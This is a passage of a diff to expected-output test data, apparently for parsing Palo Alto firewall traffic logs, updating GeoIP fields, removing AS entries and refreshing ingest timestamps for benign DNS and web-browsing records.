@@ -4065,26 +3920,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4180,7 +4030,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381790300Z", + "ingested": "2021-12-14T14:50:18.748404729Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -4205,26 +4055,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4320,7 +4165,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381795700Z", + "ingested": "2021-12-14T14:50:18.748405079Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4345,26 +4190,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9130, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4460,7 +4300,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381799700Z", + "ingested": "2021-12-14T14:50:18.748405423Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -4485,26 +4325,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4600,7 +4435,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381803500Z", + "ingested": "2021-12-14T14:50:18.748405765Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4625,26 +4460,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4740,7 +4570,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381806800Z", + "ingested": "2021-12-14T14:50:18.748406107Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4765,26 +4595,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4880,7 +4705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381811200Z", + "ingested": "2021-12-14T14:50:18.748406568Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -4905,26 +4730,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5020,7 +4840,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381816600Z", + "ingested": "2021-12-14T14:50:18.748406929Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5045,26 +4865,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5160,7 +4975,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381822Z", + "ingested": "2021-12-14T14:50:18.748407263Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5185,26 +5000,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5300,7 +5110,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381827300Z", + "ingested": "2021-12-14T14:50:18.748407600Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -5325,26 +5135,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5440,7 +5245,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381832600Z", + "ingested": "2021-12-14T14:50:18.748407955Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5465,26 +5270,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 111, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5571,7 +5371,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381837900Z", + "ingested": "2021-12-14T14:50:18.748408307Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5596,26 +5396,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5711,7 +5506,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381843300Z", + "ingested": "2021-12-14T14:50:18.748408652Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -5736,26 +5531,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5013, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5842,7 +5632,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381848600Z", + "ingested": "2021-12-14T14:50:18.748408997Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5867,26 +5657,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40026, "bytes": 99, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5982,7 +5767,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381853900Z", + "ingested": "2021-12-14T14:50:18.748409335Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6007,26 +5792,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40029, "bytes": 902, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6122,7 +5902,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381859300Z", + "ingested": "2021-12-14T14:50:18.748409687Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -6147,26 +5927,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 141, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6253,7 +6028,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381864600Z", + "ingested": "2021-12-14T14:50:18.748410036Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6278,26 +6053,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6393,7 +6163,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381867900Z", + "ingested": "2021-12-14T14:50:18.748410400Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6418,26 +6188,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6533,7 +6298,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381872100Z", + "ingested": "2021-12-14T14:50:18.748410757Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -6558,26 +6323,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6673,7 +6433,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381877500Z", + "ingested": "2021-12-14T14:50:18.748411108Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6698,26 +6458,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6813,7 +6568,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381882800Z", + "ingested": "2021-12-14T14:50:18.748411459Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6838,26 +6593,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 316, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6953,7 +6703,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381886700Z", + "ingested": "2021-12-14T14:50:18.748411806Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -6978,26 +6728,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 121, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7093,7 +6838,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381891200Z", + "ingested": "2021-12-14T14:50:18.748412263Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7118,26 +6863,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 169, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7233,7 +6973,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381896600Z", + "ingested": "2021-12-14T14:50:18.748412605Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7258,26 +6998,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 954, - "ip": 